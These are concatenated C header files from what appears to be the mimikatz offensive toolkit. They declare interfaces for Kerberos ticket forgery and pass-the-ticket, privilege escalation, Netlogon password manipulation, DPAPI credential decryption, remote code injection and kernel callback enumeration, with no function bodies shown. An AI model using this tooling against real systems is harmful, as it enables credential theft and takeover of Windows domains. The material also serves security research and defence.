DIRTY_ASN1_ID_SEQUENCE 0x30 22 | 23 | #define DIRTY_ASN1_MASK_APPLICATION 0x60 24 | #define DIRTY_ASN1_MASK_CONTEXT 0xa0 25 | 26 | #define MAKE_APP_TAG(AppId) ((ber_tag_t) (DIRTY_ASN1_MASK_APPLICATION | AppId)) 27 | #define MAKE_CTX_TAG(CtxId) ((ber_tag_t) (DIRTY_ASN1_MASK_CONTEXT | CtxId)) 28 | 29 | void kull_m_asn1_BitStringFromULONG(BerElement * pBer, ULONG data); 30 | void kull_m_asn1_GenTime(BerElement * pBer, PFILETIME localtime); 31 | void kull_m_asn1_GenString(BerElement * pBer, PCUNICODE_STRING String); 32 | 33 | typedef struct { 34 | unsigned short length; 35 | unsigned char *value; 36 | } OssEncodedOID; 37 | 38 | extern ASN1_PUBLIC BOOL ASN1API ASN1BERDotVal2Eoid(__in ASN1encoding_t pEncoderInfo, __in const ASN1char_t *dotOID, __out OssEncodedOID *encodedOID); 39 | extern ASN1_PUBLIC BOOL ASN1API ASN1BEREoid2DotVal(__in ASN1decoding_t pDecoderInfo, __in const OssEncodedOID *encodedOID, __out ASN1char_t **dotOID); 40 | 41 | BOOL kull_m_asn1_init(); 42 | void kull_m_asn1_term(); 43 | BOOL kull_m_asn1_DotVal2Eoid(__in const ASN1char_t *dotOID, __out OssEncodedOID *encodedOID); 44 | void kull_m_asn1_freeEnc(void *pBuf); 45 | BOOL kull_m_asn1_Eoid2DotVal(__in const OssEncodedOID *encodedOID, __out ASN1char_t **dotOID); 46 | void kull_m_asn1_freeDec(void *pBuf); -------------------------------------------------------------------------------- /modules/rpc/kull_m_rpc_ms-par.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include "kull_m_rpc.h" 3 | #include "kull_m_rpc_ms-rprn.h" 4 | 5 | const UUID PAR_ObjectUUID; 6 | 7 | typedef struct _SPLCLIENT_INFO_1 { 8 | DWORD dwSize; 9 | DWORD dwBuildNum; 10 | DWORD dwMajorVersion; 11 | DWORD dwMinorVersion; 12 | unsigned short wProcessorArchitecture; 13 | } SPLCLIENT_INFO_1; 14 | 15 | typedef struct _SPLCLIENT_INFO_2 { 16 | LONG_PTR notUsed; 17 | } SPLCLIENT_INFO_2; 18 | 19 | typedef struct _SPLCLIENT_INFO_3 { 20 | unsigned int cbSize; 21 | DWORD dwFlags; 22 | DWORD dwSize; 23 | wchar_t *pMachineName; 24 | wchar_t *pUserName; 25 | DWORD dwBuildNum; 26 | DWORD dwMajorVersion; 27 | DWORD dwMinorVersion; 28 | unsigned short wProcessorArchitecture; 29 | unsigned __int64 hSplPrinter; 30 | } SPLCLIENT_INFO_3; 31 | 32 | typedef struct _SPLCLIENT_CONTAINER { 33 | DWORD Level; 34 | union { 35 | SPLCLIENT_INFO_1 *pClientInfo1; 36 | SPLCLIENT_INFO_2 *pNotUsed; 37 | SPLCLIENT_INFO_3 *pClientInfo3; 38 | } ClientInfo; 39 | } SPLCLIENT_CONTAINER; 40 | 41 | DWORD RpcAsyncOpenPrinter(handle_t hRemoteBinding, wchar_t *pPrinterName, PRINTER_HANDLE *pHandle, wchar_t *pDatatype, DEVMODE_CONTAINER *pDevModeContainer, DWORD AccessRequired, SPLCLIENT_CONTAINER *pClientInfo); 42 | DWORD RpcAsyncClosePrinter(PRINTER_HANDLE *phPrinter); 43 | DWORD RpcAsyncAddPrinterDriver(handle_t hRemoteBinding, wchar_t *pName, DRIVER_CONTAINER *pDriverContainer, DWORD dwFileCopyFlags); 44 | DWORD RpcAsyncEnumPrinterDrivers(handle_t hRemoteBinding, wchar_t *pName, wchar_t *pEnvironment, DWORD Level, unsigned char *pDrivers, DWORD cbBuf, DWORD *pcbNeeded, DWORD *pcReturned); 45 | DWORD RpcAsyncGetPrinterDriverDirectory(handle_t hRemoteBinding, wchar_t *pName, wchar_t *pEnvironment, DWORD Level, unsigned char *pDriverDirectory, DWORD cbBuf, DWORD *pcbNeeded); 46 | DWORD RpcAsyncDeletePrinterDriverEx(handle_t hRemoteBinding, wchar_t *pName, wchar_t *pEnvironment, wchar_t *pDriverName, DWORD dwDeleteFlag, DWORD dwVersionNum); -------------------------------------------------------------------------------- /mimidrv/globals.h: -------------------------------------------------------------------------------- 1 | /* Benjamin DELPY `gentilkiwi` 2 | blog.gentilkiwi.com 3 | benjamin@gentilkiwi.com 4 | Licence : creativecommons.org/licenses/by/4.0/ 5 | */ 6 | #pragma once 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include 12 | #include 13 | #include "ioctl.h" 14 | 15 | #define POOL_TAG 'kiwi' 16 | #define MIMIDRV L"mimidrv" 17 | 18 | #define kprintf(KiwiBuffer, Format, ...) (RtlStringCbPrintfExW(*(KiwiBuffer)->Buffer, *(KiwiBuffer)->szBuffer, (KiwiBuffer)->Buffer, (KiwiBuffer)->szBuffer, STRSAFE_NO_TRUNCATION, Format, __VA_ARGS__)) 19 | 20 | extern char * PsGetProcessImageFileName(PEPROCESS monProcess); 21 | extern NTSYSAPI NTSTATUS NTAPI ZwSetInformationProcess (__in HANDLE ProcessHandle, __in PROCESSINFOCLASS ProcessInformationClass, __in_bcount(ProcessInformationLength) PVOID ProcessInformation, __in ULONG ProcessInformationLength); 22 | extern NTSYSAPI NTSTATUS NTAPI ZwUnloadKey(IN POBJECT_ATTRIBUTES DestinationKeyName); 23 | 24 | typedef struct _KIWI_BUFFER { 25 | size_t * szBuffer; 26 | PWSTR * Buffer; 27 | } KIWI_BUFFER, *PKIWI_BUFFER; 28 | 29 | typedef enum _KIWI_OS_INDEX { 30 | KiwiOsIndex_UNK = 0, 31 | KiwiOsIndex_XP = 1, 32 | KiwiOsIndex_2K3 = 2, 33 | KiwiOsIndex_VISTA = 3, 34 | KiwiOsIndex_7 = 4, 35 | KiwiOsIndex_8 = 5, 36 | KiwiOsIndex_BLUE = 6, 37 | KiwiOsIndex_10_1507 = 7, 38 | KiwiOsIndex_10_1511 = 8, 39 | KiwiOsIndex_10_1607 = 9, 40 | KiwiOsIndex_10_1703 = 10, 41 | KiwiOsIndex_10_1709 = 11, 42 | KiwiOsIndex_10_1803 = 12, 43 | KiwiOsIndex_10_1809 = 13, 44 | KiwiOsIndex_10_1903 = 14, 45 | KiwiOsIndex_10_1909 = 15, 46 | KiwiOsIndex_10_2004 = 16, 47 | KiwiOsIndex_MAX = 17, 48 | } KIWI_OS_INDEX, *PKIWI_OS_INDEX; 49 | 50 | #if defined(_M_X64) || defined(_M_ARM64) // TODO:ARM64 51 | #define EX_FAST_REF_MASK 0x0f 52 | #elif defined(_M_IX86) 53 | #define EX_FAST_REF_MASK 0x07 54 | #endif 55 | 56 | #define KIWI_mask3bits(addr) (((ULONG_PTR) (addr)) & ~7) 57 | 58 | KIWI_OS_INDEX KiwiOsIndex; -------------------------------------------------------------------------------- /plog/modules/kuhl_m_privilege.h: -------------------------------------------------------------------------------- 1 | /* Benjamin DELPY `gentilkiwi` 2 | blog.gentilkiwi.com 3 | benjamin@gentilkiwi.com 4 | Licence : creativecommons.org/licenses/by/4.0/ 5 | */ 6 | #pragma once 7 | #include "kuhl_m.h" 8 | #include "../modules/kull_m_process.h" 9 | 10 | const KUHL_M kuhl_m_privilege; 11 | 12 | NTSTATUS kuhl_m_privilege_debug(int argc, wchar_t * argv[]); 13 | NTSTATUS kuhl_m_privilege_driver(int argc, wchar_t * argv[]); 14 | NTSTATUS kuhl_m_privilege_security(int argc, wchar_t * argv[]); 15 | NTSTATUS kuhl_m_privilege_tcb(int argc, wchar_t * argv[]); 16 | NTSTATUS kuhl_m_privilege_backup(int argc, wchar_t * argv[]); 17 | NTSTATUS kuhl_m_privilege_restore(int argc, wchar_t * argv[]); 18 | NTSTATUS kuhl_m_privilege_sysenv(int argc, wchar_t * argv[]); 19 | 20 | NTSTATUS kuhl_m_privilege_id(int argc, wchar_t * argv[]); 21 | NTSTATUS kuhl_m_privilege_name(int argc, wchar_t * argv[]); 22 | 23 | NTSTATUS kuhl_m_privilege_simple(ULONG privId); 24 | 25 | #define SE_CREATE_TOKEN 2 26 | #define SE_ASSIGNPRIMARYTOKEN 3 27 | #define SE_LOCK_MEMORY 4 28 | #define SE_INCREASE_QUOTA 5 29 | #define SE_UNSOLICITED_INPUT 6 30 | #define SE_TCB 7 31 | #define SE_SECURITY 8 32 | #define SE_TAKE_OWNERSHIP 9 33 | #define SE_LOAD_DRIVER 10 34 | #define SE_SYSTEM_PROFILE 11 35 | #define SE_SYSTEMTIME 12 36 | #define SE_PROF_SINGLE_PROCESS 13 37 | #define SE_INC_BASE_PRIORITY 14 38 | #define SE_CREATE_PAGEFILE 15 39 | #define SE_CREATE_PERMANENT 16 40 | #define SE_BACKUP 17 41 | #define SE_RESTORE 18 42 | #define SE_SHUTDOWN 19 43 | #define SE_DEBUG 20 44 | #define SE_AUDIT 21 45 | #define SE_SYSTEM_ENVIRONMENT 22 46 | #define SE_CHANGE_NOTIFY 23 47 | #define SE_REMOTE_SHUTDOWN 24 48 | #define SE_UNDOCK 25 49 | #define SE_SYNC_AGENT 26 50 | #define SE_ENABLE_DELEGATION 27 51 | #define SE_MANAGE_VOLUME 28 52 | #define SE_IMPERSONATE 29 53 | #define SE_CREATE_GLOBAL 30 54 | #define SE_TRUSTED_CREDMAN_ACCESS 31 55 | #define SE_RELABEL 32 56 | #define SE_INC_WORKING_SET 33 57 | #define SE_TIME_ZONE 34 58 | #define SE_CREATE_SYMBOLIC_LINK 35 -------------------------------------------------------------------------------- /modules/kull_m_crypto_sk.h: -------------------------------------------------------------------------------- 1 | /* Benjamin DELPY `gentilkiwi` 2 | blog.gentilkiwi.com 3 | benjamin@gentilkiwi.com 4 | Licence : creativecommons.org/licenses/by/4.0/ 5 | */ 6 | #pragma once 7 | #include "globals.h" 8 | #include "kull_m_string.h" 9 | 10 | #if !defined(BCRYPT_SP800108_CTR_HMAC_ALGORITHM) 11 | #define BCRYPT_SP800108_CTR_HMAC_ALGORITHM L"SP800_108_CTR_HMAC" 12 | #define KDF_LABEL 0xD 13 | #define KDF_CONTEXT 0xE 14 | #define KDF_SALT 0xF 15 | #define KDF_ITERATION_COUNT 0x10 16 | 17 | extern NTSTATUS WINAPI BCryptKeyDerivation(IN BCRYPT_KEY_HANDLE hKey, IN OPTIONAL BCryptBufferDesc *pParameterList, OUT PUCHAR pbDerivedKey, IN ULONG cbDerivedKey, OUT ULONG *pcbResult, IN ULONG dwFlags); 18 | #endif 19 | 20 | #define IUMDATAPROTECT "IUMDATAPROTECT" 21 | typedef NTSTATUS (WINAPI * PBCRYPT_ENCRYPT) (__inout BCRYPT_KEY_HANDLE hKey, __in_bcount_opt(cbInput) PUCHAR pbInput, __in ULONG cbInput, __in_opt VOID *pPaddingInfo, __inout_bcount_opt(cbIV) PUCHAR pbIV, __in ULONG cbIV, __out_bcount_part_opt(cbOutput, *pcbResult) PUCHAR pbOutput, __in ULONG cbOutput, __out ULONG *pcbResult, __in ULONG dwFlags); 22 | 23 | NTSTATUS SkpOpenAesGcmProvider(BCRYPT_ALG_HANDLE *phAlgAESGCM, DWORD *pObjectLengthAesGcm); 24 | NTSTATUS SkpOpenKdfProvider(BCRYPT_ALG_HANDLE *phAlgSP800108, DWORD *pObjectLengthSP800108); 25 | NTSTATUS SkpImportMasterKeyInKdf(PBYTE BootKey, DWORD cbBootKey, BCRYPT_ALG_HANDLE hAlgSP800108, DWORD ObjectLengthSP800108, BCRYPT_KEY_HANDLE *phKeySP800108, UCHAR *pbKeyObject); 26 | NTSTATUS SkpInitSymmetricEncryption(PBYTE BootKey, DWORD cbBootKey, BCRYPT_ALG_HANDLE *phAlgAESGCM, DWORD *pObjectLengthAesGcm, BCRYPT_ALG_HANDLE *phAlgSP800108, DWORD *pObjectLengthSP800108, BCRYPT_KEY_HANDLE *phKeySP800108, PUCHAR *pbKeyObject); 27 | NTSTATUS SkpDeriveSymmetricKey(BCRYPT_KEY_HANDLE hKey, CHAR *cLabel, ULONG cbLabel, PBYTE pContext, ULONG cbContext, PUCHAR pbDerivedKey, ULONG cbDerivedKey); 28 | NTSTATUS SkpEncryptionWorker(PBYTE BootKey, DWORD cbBootKey, UCHAR *pbInput, ULONG cbInput, UCHAR *pbAuthData, ULONG cbAuthData, UCHAR *pKdfContext, ULONG cbKdfContext, UCHAR *pbTag, ULONG cbTag, UCHAR *pbOutput, ULONG cbOutput, BOOL Encrypt); -------------------------------------------------------------------------------- /modules/kull_m_remotelib.h: -------------------------------------------------------------------------------- 1 | /* Benjamin DELPY `gentilkiwi` 2 | blog.gentilkiwi.com 3 | benjamin@gentilkiwi.com 4 | Licence : creativecommons.org/licenses/by/4.0/ 5 | */ 6 | #pragma once 7 | #include "globals.h" 8 | #include "../modules/kull_m_process.h" 9 | 10 | typedef struct _REMOTE_LIB_OUTPUT_DATA { 11 | PVOID outputVoid; 12 | DWORD outputDword; 13 | NTSTATUS outputStatus; 14 | DWORD outputSize; 15 | PVOID outputData; 16 | } REMOTE_LIB_OUTPUT_DATA, *PREMOTE_LIB_OUTPUT_DATA; 17 | 18 | typedef struct _REMOTE_LIB_INPUT_DATA { 19 | PVOID inputVoid; 20 | DWORD inputDword; 21 | DWORD inputSize; 22 | BYTE inputData[ANYSIZE_ARRAY]; 23 | } REMOTE_LIB_INPUT_DATA, *PREMOTE_LIB_INPUT_DATA; 24 | 25 | typedef struct _REMOTE_LIB_DATA { 26 | REMOTE_LIB_OUTPUT_DATA output; 27 | REMOTE_LIB_INPUT_DATA input; 28 | } REMOTE_LIB_DATA, *PREMOTE_LIB_DATA; 29 | 30 | typedef struct _REMOTE_EXT { 31 | PCWCHAR Module; 32 | PCHAR Function; 33 | PVOID ToReplace; 34 | PVOID Pointer; 35 | } REMOTE_EXT, *PREMOTE_EXT; 36 | 37 | typedef struct _MULTIPLE_REMOTE_EXT { 38 | DWORD count; 39 | PREMOTE_EXT extensions; 40 | } MULTIPLE_REMOTE_EXT, *PMULTIPLE_REMOTE_EXT; 41 | 42 | BOOL CALLBACK kull_m_remotelib_callback_module_exportedEntry(PKULL_M_PROCESS_EXPORTED_ENTRY pExportedEntryInformations, PVOID pvArg); 43 | PREMOTE_LIB_INPUT_DATA kull_m_remotelib_CreateInput(PVOID inputVoid, DWORD inputDword, DWORD inputSize, LPCVOID inputData); 44 | BOOL kull_m_remotelib_create(PKULL_M_MEMORY_ADDRESS aRemoteFunc, PREMOTE_LIB_INPUT_DATA input, PREMOTE_LIB_OUTPUT_DATA output); 45 | 46 | BOOL CALLBACK kull_m_remotelib_exports_callback_module_exportedEntry(PKULL_M_PROCESS_EXPORTED_ENTRY pExportedEntryInformations, PVOID pvArg); 47 | BOOL CALLBACK kull_m_remotelib_exports_callback_module(PKULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION pModuleInformation, PVOID pvArg); 48 | BOOL kull_m_remotelib_GetProcAddressMultipleModules(PKULL_M_MEMORY_HANDLE hProcess, PMULTIPLE_REMOTE_EXT extForCb); 49 | BOOL kull_m_remotelib_CreateRemoteCodeWitthPatternReplace(PKULL_M_MEMORY_HANDLE hProcess, LPCVOID Buffer, DWORD BufferSize, PMULTIPLE_REMOTE_EXT RemoteExt, PKULL_M_MEMORY_ADDRESS DestAddress); -------------------------------------------------------------------------------- /mimidrv/kkll_m_notify.h: -------------------------------------------------------------------------------- 1 | /* Benjamin DELPY `gentilkiwi` 2 | blog.gentilkiwi.com 3 | benjamin@gentilkiwi.com 4 | Licence : creativecommons.org/licenses/by/4.0/ 5 | */ 6 | #pragma once 7 | #include "globals.h" 8 | #include "kkll_m_memory.h" 9 | #include "kkll_m_modules.h" 10 | 11 | #define OBJECT_HASH_TABLE_SIZE 37 12 | #define CM_REG_MAX_CALLBACKS 100 13 | 14 | typedef struct _KKLL_M_NOTIFY_CALLBACK { 15 | #if defined(_M_IX86) 16 | ULONG unk0; 17 | #endif 18 | PVOID * callback; 19 | } KKLL_M_NOTIFY_CALLBACK, *PKKLL_M_NOTIFY_CALLBACK; 20 | 21 | typedef struct _OBJECT_DIRECTORY_ENTRY { 22 | struct _OBJECT_DIRECTORY_ENTRY * ChainLink; 23 | PVOID Object; 24 | } OBJECT_DIRECTORY_ENTRY, *POBJECT_DIRECTORY_ENTRY; 25 | 26 | typedef struct _OBJECT_DIRECTORY { 27 | POBJECT_DIRECTORY_ENTRY HashBuckets[OBJECT_HASH_TABLE_SIZE]; 28 | /* ... */ 29 | } OBJECT_DIRECTORY, *POBJECT_DIRECTORY; 30 | 31 | typedef struct _OBJECT_CALLBACK_ENTRY { 32 | LIST_ENTRY CallbackList; 33 | OB_OPERATION Operations; 34 | ULONG Active; 35 | /*OB_HANDLE*/ PVOID Handle; 36 | POBJECT_TYPE ObjectType; 37 | POB_PRE_OPERATION_CALLBACK PreOperation; 38 | POB_POST_OPERATION_CALLBACK PostOperation; 39 | /* ... */ 40 | } OBJECT_CALLBACK_ENTRY, *POBJECT_CALLBACK_ENTRY; 41 | 42 | typedef NTSTATUS (* PPSSETCREATEPROCESSNOTIFYROUTINEEX) ( __in PCREATE_PROCESS_NOTIFY_ROUTINE_EX NotifyRoutine, __in BOOLEAN Remove); 43 | //typedef VOID (* POBUNREGISTERCALLBACKS) (__in PVOID RegistrationHandle); 44 | 45 | NTSTATUS kkll_m_notify_list_thread(PKIWI_BUFFER outBuffer); 46 | NTSTATUS kkll_m_notify_list_process(PKIWI_BUFFER outBuffer); 47 | NTSTATUS kkll_m_notify_list_image(PKIWI_BUFFER outBuffer); 48 | NTSTATUS kkll_m_notify_list_reg(PKIWI_BUFFER outBuffer); 49 | NTSTATUS kkll_m_notify_list_object(PKIWI_BUFFER outBuffer); 50 | NTSTATUS kkll_m_notify_desc_object_callback(POBJECT_CALLBACK_ENTRY pCallbackEntry, PKIWI_BUFFER outBuffer); 51 | 52 | NTSTATUS kkll_m_notify_list(PKIWI_BUFFER outBuffer, PKKLL_M_MEMORY_GENERIC generics, SIZE_T cbGenerics, PUCHAR * ptr, PULONG pRoutineMax); 53 | NTSTATUS kkll_m_notify_search(PKKLL_M_MEMORY_GENERIC generics, SIZE_T cbGenerics, PUCHAR * ptr, PULONG pRoutineMax, PKKLL_M_MEMORY_OFFSETS * pOffsets); -------------------------------------------------------------------------------- /modules/kull_m_token.h: -------------------------------------------------------------------------------- 1 | /* Benjamin DELPY `gentilkiwi` 2 | blog.gentilkiwi.com 3 | benjamin@gentilkiwi.com 4 | Licence : creativecommons.org/licenses/by/4.0/ 5 | */ 6 | #pragma once 7 | #include "globals.h" 8 | #include "kull_m_handle.h" 9 | #include 10 | 11 | extern NTSTATUS NTAPI NtCompareTokens(IN HANDLE FirstTokenHandle, IN HANDLE SecondTokenHandle, OUT PBOOLEAN Equal); 12 | 13 | typedef BOOL (CALLBACK * PKULL_M_TOKEN_ENUM_CALLBACK) (HANDLE hToken, DWORD ptid, PVOID pvArg); 14 | 15 | typedef struct _KULL_M_TOKEN_ENUM_DATA { 16 | PKULL_M_TOKEN_ENUM_CALLBACK callback; 17 | PVOID pvArg; 18 | BOOL mustContinue; 19 | } KULL_M_TOKEN_ENUM_DATA, *PKULL_M_TOKEN_ENUM_DATA; 20 | 21 | typedef struct _KULL_M_TOKEN_LIST { 22 | HANDLE hToken; 23 | DWORD ptid; 24 | struct _KULL_M_TOKEN_LIST *next; 25 | } KULL_M_TOKEN_LIST, *PKULL_M_TOKEN_LIST; 26 | 27 | BOOL kull_m_token_getTokens(PKULL_M_TOKEN_ENUM_CALLBACK callBack, PVOID pvArg); 28 | BOOL kull_m_token_getTokensUnique(PKULL_M_TOKEN_ENUM_CALLBACK callBack, PVOID pvArg); 29 | BOOL CALLBACK kull_m_token_getTokensUnique_callback(HANDLE hToken, DWORD ptid, PVOID pvArg); 30 | BOOL CALLBACK kull_m_token_getTokens_process_callback(PSYSTEM_PROCESS_INFORMATION pSystemProcessInformation, PVOID pvArg); 31 | BOOL CALLBACK kull_m_token_getTokens_handles_callback(HANDLE handle, PSYSTEM_HANDLE pSystemHandle, PVOID pvArg); 32 | 33 | BOOL kull_m_token_getNameDomainFromToken(HANDLE hToken, PWSTR * pName, PWSTR * pDomain, PWSTR * pSid, PSID_NAME_USE pSidNameUse); 34 | BOOL kull_m_token_CheckTokenMembership(__in_opt HANDLE TokenHandle, __in PSID SidToCheck, __out PBOOL IsMember); 35 | PCWCHAR kull_m_token_getSidNameUse(SID_NAME_USE SidNameUse); 36 | BOOL kull_m_token_getNameDomainFromSID(PSID pSid, PWSTR * pName, PWSTR * pDomain, PSID_NAME_USE pSidNameUse, LPCWSTR system); 37 | BOOL kull_m_token_getSidDomainFromName(PCWSTR pName, PSID * pSid, PWSTR * pDomain, PSID_NAME_USE pSidNameUse, LPCWSTR system); 38 | 39 | BOOL kull_m_token_equal(IN HANDLE First, IN HANDLE Second); 40 | PTOKEN_USER kull_m_token_getUserFromToken(HANDLE hToken); 41 | PWSTR kull_m_token_getSidFromToken(HANDLE hToken); 42 | PWSTR kull_m_token_getCurrentSid(); 43 | BOOL kull_m_token_isLocalAccount(__in_opt HANDLE TokenHandle, __out PBOOL IsMember); -------------------------------------------------------------------------------- /modules/rpc/kull_m_rpc_ms-nrpc.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include "kull_m_rpc.h" 3 | #include "../kull_m_samlib.h" 4 | 5 | typedef wchar_t * LOGONSRV_HANDLE; 6 | typedef struct _NETLOGON_CREDENTIAL { 7 | CHAR data[8]; 8 | } NETLOGON_CREDENTIAL, *PNETLOGON_CREDENTIAL; 9 | 10 | typedef enum _NETLOGON_SECURE_CHANNEL_TYPE { 11 | NullSecureChannel = 0, 12 | MsvApSecureChannel = 1, 13 | WorkstationSecureChannel = 2, 14 | TrustedDnsDomainSecureChannel = 3, 15 | TrustedDomainSecureChannel = 4, 16 | UasServerSecureChannel = 5, 17 | ServerSecureChannel = 6, 18 | CdcServerSecureChannel = 7 19 | } NETLOGON_SECURE_CHANNEL_TYPE; 20 | 21 | typedef struct _NETLOGON_AUTHENTICATOR { 22 | NETLOGON_CREDENTIAL Credential; 23 | DWORD Timestamp; 24 | } NETLOGON_AUTHENTICATOR, *PNETLOGON_AUTHENTICATOR; 25 | 26 | typedef struct _NL_TRUST_PASSWORD { 27 | WCHAR Buffer[256]; 28 | ULONG Length; 29 | } NL_TRUST_PASSWORD, *PNL_TRUST_PASSWORD; 30 | 31 | NTSTATUS NetrServerReqChallenge(IN LOGONSRV_HANDLE PrimaryName, IN wchar_t *ComputerName, IN PNETLOGON_CREDENTIAL ClientChallenge, OUT PNETLOGON_CREDENTIAL ServerChallenge); 32 | NTSTATUS NetrServerAuthenticate2(IN LOGONSRV_HANDLE PrimaryName, IN wchar_t *AccountName, IN NETLOGON_SECURE_CHANNEL_TYPE SecureChannelType, IN wchar_t *ComputerName, IN PNETLOGON_CREDENTIAL ClientCredential, OUT PNETLOGON_CREDENTIAL ServerCredential, IN OUT ULONG *NegotiateFlags); 33 | NTSTATUS NetrServerPasswordSet2(IN LOGONSRV_HANDLE PrimaryName, IN wchar_t *AccountName, IN NETLOGON_SECURE_CHANNEL_TYPE SecureChannelType, IN wchar_t *ComputerName, IN PNETLOGON_AUTHENTICATOR Authenticator, OUT PNETLOGON_AUTHENTICATOR ReturnAuthenticator, IN PNL_TRUST_PASSWORD ClearNewPassword); 34 | NTSTATUS NetrServerTrustPasswordsGet(IN LOGONSRV_HANDLE TrustedDcName, IN wchar_t *AccountName, IN NETLOGON_SECURE_CHANNEL_TYPE SecureChannelType, IN wchar_t *ComputerName, IN PNETLOGON_AUTHENTICATOR Authenticator, OUT PNETLOGON_AUTHENTICATOR ReturnAuthenticator, OUT PENCRYPTED_NT_OWF_PASSWORD EncryptedNewOwfPassword, OUT PENCRYPTED_NT_OWF_PASSWORD EncryptedOldOwfPassword); 35 | 36 | extern handle_t hLogon; 37 | extern RPC_IF_HANDLE logon_v1_0_c_ifspec; 38 | 39 | handle_t __RPC_USER LOGONSRV_HANDLE_bind(IN LOGONSRV_HANDLE Name); 40 | void __RPC_USER LOGONSRV_HANDLE_unbind(IN LOGONSRV_HANDLE Name, handle_t hLogon); -------------------------------------------------------------------------------- /modules/rpc/kull_m_rpc_dpapi-entries.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include "kull_m_rpc.h" 3 | #include "../kull_m_crypto.h" 4 | 5 | typedef struct _KUHL_M_DPAPI_MASTERKEY_ENTRY { 6 | GUID guid; 7 | BYTE keyHash[SHA_DIGEST_LENGTH]; 8 | DWORD keyLen; 9 | BYTE *key; 10 | } KUHL_M_DPAPI_MASTERKEY_ENTRY, *PKUHL_M_DPAPI_MASTERKEY_ENTRY; 11 | 12 | typedef struct _KUHL_M_DPAPI_CREDENTIAL_ENTRY { 13 | DWORD flags; 14 | GUID guid; 15 | WCHAR *sid; 16 | BYTE md4hash[LM_NTLM_HASH_LENGTH]; 17 | BYTE md4hashDerived[SHA_DIGEST_LENGTH]; 18 | BYTE sha1hash[SHA_DIGEST_LENGTH]; 19 | BYTE sha1hashDerived[SHA_DIGEST_LENGTH]; 20 | BYTE md4protectedhash[LM_NTLM_HASH_LENGTH]; 21 | BYTE md4protectedhashDerived[SHA_DIGEST_LENGTH]; 22 | } KUHL_M_DPAPI_CREDENTIAL_ENTRY, *PKUHL_M_DPAPI_CREDENTIAL_ENTRY; 23 | 24 | typedef struct _KUHL_M_DPAPI_DOMAINKEY_ENTRY { 25 | GUID guid; 26 | BOOL isNewKey; 27 | DWORD keyLen; 28 | BYTE *key; 29 | } KUHL_M_DPAPI_DOMAINKEY_ENTRY, *PKUHL_M_DPAPI_DOMAINKEY_ENTRY; 30 | 31 | typedef struct _KUHL_M_DPAPI_ENTRIES { 32 | DWORD MasterKeyCount; 33 | PKUHL_M_DPAPI_MASTERKEY_ENTRY *MasterKeys; 34 | DWORD CredentialCount; 35 | PKUHL_M_DPAPI_CREDENTIAL_ENTRY *Credentials; 36 | DWORD DomainKeyCount; 37 | PKUHL_M_DPAPI_DOMAINKEY_ENTRY *DomainKeys; 38 | } KUHL_M_DPAPI_ENTRIES, *PKUHL_M_DPAPI_ENTRIES; 39 | 40 | size_t KUHL_M_DPAPI_ENTRIES_AlignSize(handle_t _MidlEsHandle, KUHL_M_DPAPI_ENTRIES * _pType); 41 | void KUHL_M_DPAPI_ENTRIES_Encode(handle_t _MidlEsHandle, KUHL_M_DPAPI_ENTRIES * _pType); 42 | void KUHL_M_DPAPI_ENTRIES_Decode(handle_t _MidlEsHandle, KUHL_M_DPAPI_ENTRIES * _pType); 43 | void KUHL_M_DPAPI_ENTRIES_Free(handle_t _MidlEsHandle, KUHL_M_DPAPI_ENTRIES * _pType); 44 | 45 | #define kull_m_dpapi_oe_DecodeDpapiEntries(/*PVOID */data, /*DWORD */size, /*KUHL_M_DPAPI_ENTRIES **/pObject) kull_m_rpc_Generic_Decode(data, size, pObject, (PGENERIC_RPC_DECODE) KUHL_M_DPAPI_ENTRIES_Decode) 46 | #define kull_m_dpapi_oe_FreeDpapiEntries(/*KUHL_M_DPAPI_ENTRIES **/pObject) kull_m_rpc_Generic_Free(pObject, (PGENERIC_RPC_FREE) KUHL_M_DPAPI_ENTRIES_Free) 47 | #define kull_m_dpapi_oe_EncodeDpapiEntries(/*KUHL_M_DPAPI_ENTRIES **/pObject, /*PVOID **/data, /*DWORD **/size) kull_m_rpc_Generic_Encode(pObject, data, size, (PGENERIC_RPC_ENCODE) KUHL_M_DPAPI_ENTRIES_Encode, (PGENERIC_RPC_ALIGNSIZE) KUHL_M_DPAPI_ENTRIES_AlignSize) -------------------------------------------------------------------------------- /plog/modules/kerberos/kuhl_m_kerberos.h: -------------------------------------------------------------------------------- 1 | /* Benjamin DELPY `gentilkiwi` 2 | blog.gentilkiwi.com 3 | benjamin@gentilkiwi.com 4 | Licence : creativecommons.org/licenses/by/4.0/ 5 | */ 6 | #pragma once 7 | #include "../kuhl_m.h" 8 | #include "../modules/kull_m_file.h" 9 | #include "../modules/kull_m_crypto_system.h" 10 | #include "kuhl_m_kerberos_ticket.h" 11 | 12 | #define KRB_KEY_USAGE_AS_REP_TGS_REP 2 13 | 14 | typedef struct _KUHL_M_KERBEROS_LIFETIME_DATA { 15 | FILETIME TicketStart; 16 | FILETIME TicketEnd; 17 | FILETIME TicketRenew; 18 | } KUHL_M_KERBEROS_LIFETIME_DATA, *PKUHL_M_KERBEROS_LIFETIME_DATA; 19 | 20 | const KUHL_M kuhl_m_kerberos; 21 | 22 | NTSTATUS kuhl_m_kerberos_init(); 23 | NTSTATUS kuhl_m_kerberos_clean(); 24 | 25 | NTSTATUS LsaCallKerberosPackage(PVOID ProtocolSubmitBuffer, ULONG SubmitBufferLength, PVOID *ProtocolReturnBuffer, PULONG ReturnBufferLength, PNTSTATUS ProtocolStatus); 26 | 27 | NTSTATUS kuhl_m_kerberos_ptt(int argc, wchar_t * argv[]); 28 | BOOL CALLBACK kuhl_m_kerberos_ptt_directory(DWORD level, PCWCHAR fullpath, PCWCHAR path, PVOID pvArg); 29 | void kuhl_m_kerberos_ptt_file(PCWCHAR filename); 30 | NTSTATUS kuhl_m_kerberos_ptt_data(PVOID data, DWORD dataSize); 31 | NTSTATUS kuhl_m_kerberos_golden(int argc, wchar_t * argv[]); 32 | NTSTATUS kuhl_m_kerberos_list(int argc, wchar_t * argv[]); 33 | NTSTATUS kuhl_m_kerberos_ask(int argc, wchar_t * argv[]); 34 | NTSTATUS kuhl_m_kerberos_tgt(int argc, wchar_t * argv[]); 35 | NTSTATUS kuhl_m_kerberos_purge(int argc, wchar_t * argv[]); 36 | NTSTATUS kuhl_m_kerberos_hash(int argc, wchar_t * argv[]); 37 | NTSTATUS kuhl_m_kerberos_decode(int argc, wchar_t * argv[]); 38 